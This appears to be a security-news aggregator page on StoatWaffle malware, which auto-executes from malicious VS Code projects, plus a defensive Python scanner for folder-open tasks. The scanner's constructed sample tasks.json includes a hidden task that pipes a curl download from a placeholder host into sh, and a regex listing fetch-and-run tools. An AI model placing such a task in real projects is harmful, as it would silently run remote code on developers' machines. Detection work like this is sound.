Signal

New StoatWaffle malware targets developers via malicious VS Code projects


Published 2026-03-24 10:49 UTC · Updated 2026-03-24 17:30 UTC
Tags: malware, threat_actors, security_tooling, incident_response
Overview

A new malware strain called StoatWaffle, attributed to the North Korean threat actor WaterPlum and its Contagious Interview campaign, has evolved so that the payload embedded in a booby-trapped Visual Studio Code project executes automatically once a developer opens and trusts the project folder.

Entities
StoatWaffle · Contagious Interview · WaterPlum
Why now
  • StoatWaffle has been actively deployed since December, signaling ongoing threat activity.
  • Recent disclosures highlight a shift to more seamless, frictionless malware execution in developer tools.
  • Concurrent GitHub malware campaigns using split payloads increase risks to developers and related users.
Why it matters
  • StoatWaffle lowers the barrier for developer environment compromise by auto-executing malicious code on folder open.
  • Developers’ trusted tools and workflows are increasingly targeted, expanding the attack surface beyond traditional malware delivery methods.
  • Detection efforts must adapt to weaponized development environments, not just malicious packages or phishing lures.
LLM analysis
Topic mix: low · Promo risk: low · Source quality: medium
Recurring claims
  • StoatWaffle malware auto-executes attacks embedded in Visual Studio Code projects when folders are opened and trusted by developers.
  • WaterPlum, a North Korean threat actor, has deployed StoatWaffle since December using blockchain-themed VS Code project repositories as decoys.
  • A separate large-scale GitHub-hosted malware campaign uses split payloads to evade detection, targeting developers and gamers with trojanized repositories.
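The "auto-executes when the folder is opened and trusted" claim above is the detail a defender can act on before a clone is ever opened. The scanner below is an added example, not code from the article or from any of its sources. It assumes the trigger in use is VS Code's documented tasks.json option `"runOptions": {"runOn": "folderOpen"}`, which VS Code honours only in a trusted workspace; the sample repository and its tasks.json are constructed for the demo and are not real campaign artifacts, and the "suspicious command" regex is a hypothetical heuristic, not an indicator from the reporting.

```python
"""Find VS Code tasks that would start automatically on folder open.

Added example (not from the article or its sources). Assumes the
auto-execution the page describes uses the documented tasks.json trigger
"runOptions": {"runOn": "folderOpen"}. Sample data below is constructed.
"""
import json
import os
import re
import shutil
import tempfile

# tasks.json is JSON-with-comments: drop // and /* */ comments, but keep
# string literals intact (they may legitimately contain "//", e.g. URLs).
_COMMENT_RE = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/', re.DOTALL)
_TRAILING_COMMA_RE = re.compile(r",(\s*[}\]])")

# Hypothetical heuristic for "fetch or decode, then run" commands.
_SUSPICIOUS_RE = re.compile(
    r"curl|wget|Invoke-WebRequest|\biwr\b|node -e|python3? -c|"
    r"-EncodedCommand|base64|\|\s*(ba)?sh\b|eval\(",
    re.IGNORECASE,
)


def load_jsonc(text: str):
    """Parse the JSON-with-comments dialect VS Code accepts for tasks.json."""
    stripped = _COMMENT_RE.sub(lambda m: m.group(1) or "", text)
    stripped = _TRAILING_COMMA_RE.sub(r"\1", stripped)
    return json.loads(stripped)


def task_command(task: dict) -> str:
    """Render command plus args as one string for display and matching."""
    parts = []
    for key in ("command", "args"):
        value = task.get(key)
        if isinstance(value, str):
            parts.append(value)
        elif isinstance(value, list):
            parts.extend(str(item) for item in value)
    return " ".join(parts)


def scan_tasks_file(path: str) -> list:
    """One finding per task that VS Code would start when the folder opens."""
    with open(path, encoding="utf-8-sig") as fh:
        doc = load_jsonc(fh.read())
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        command = task_command(task)
        reveal = (task.get("presentation") or {}).get("reveal", "always")
        findings.append({
            "file": path,
            "label": task.get("label", "<unlabelled>"),
            "command": command,
            "hidden": reveal in ("never", "silent"),  # terminal never shown
            "suspicious": bool(_SUSPICIOUS_RE.search(command)),
        })
    return findings


def scan_repo(root: str) -> list:
    """Walk a checkout and scan every .vscode/tasks.json, nested ones too."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            findings.extend(scan_tasks_file(os.path.join(dirpath, "tasks.json")))
    return findings


# Constructed sample: an ordinary build task next to a hidden folderOpen task.
SAMPLE_TASKS_JSON = """{
  // Looks like a routine build configuration
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "Verify workspace",   /* innocuous-sounding label */
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('child_process').exec('curl -s https://example.invalid/p | sh')"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
  ]
}
"""


def demo() -> list:
    """Write the constructed sample into a temporary checkout and scan it."""
    root = tempfile.mkdtemp(prefix="vscode-scan-")
    try:
        os.makedirs(os.path.join(root, ".vscode"))
        with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_TASKS_JSON)
        return scan_repo(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in demo():
        flags = "/".join(k for k in ("hidden", "suspicious") if f[k]) or "review"
        print(f"[{flags}] {f['label']}: {f['command']}")
```

Run it against a fresh clone before opening the folder in VS Code (for example as a pre-open hook or a CI check on candidate repositories). Any folderOpen task is worth a manual look, because nothing in a "build" or "verify" label constrains what the command does; the hidden flag matters because a task whose terminal is never revealed leaves the developer with no visual cue that anything ran. The scanner does not cover `.code-workspace` files, which can also carry a tasks section, so check those by hand. The gate that makes the trigger fire is Workspace Trust: keep `security.workspace.trust.enabled` on and do not trust a folder you have not inspected, and where a team can live without automatic tasks, the `task.allowAutomaticTasks` setting can turn them off entirely.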
How sources frame it
  • CSO Online: neutral
  • SC Media: neutral
  • Help Net Security: neutral
This emerging malware campaign highlights the growing risk of weaponized developer environments and the need for enhanced detection strategies focused on trusted tools like VS Code.
All evidence
Illicit VS Code projects tapped to deploy StoatWaffle malware
SC Media · scworld.com · 2026-03-24 17:30 UTC
New ‘StoatWaffle’ malware auto‑executes attacks on developers
CSO Online · csoonline.com · 2026-03-24 11:58 UTC
GitHub-hosted malware campaign uses split payload to evade detection
Help Net Security · helpnetsecurity.com · 2026-03-24 10:49 UTC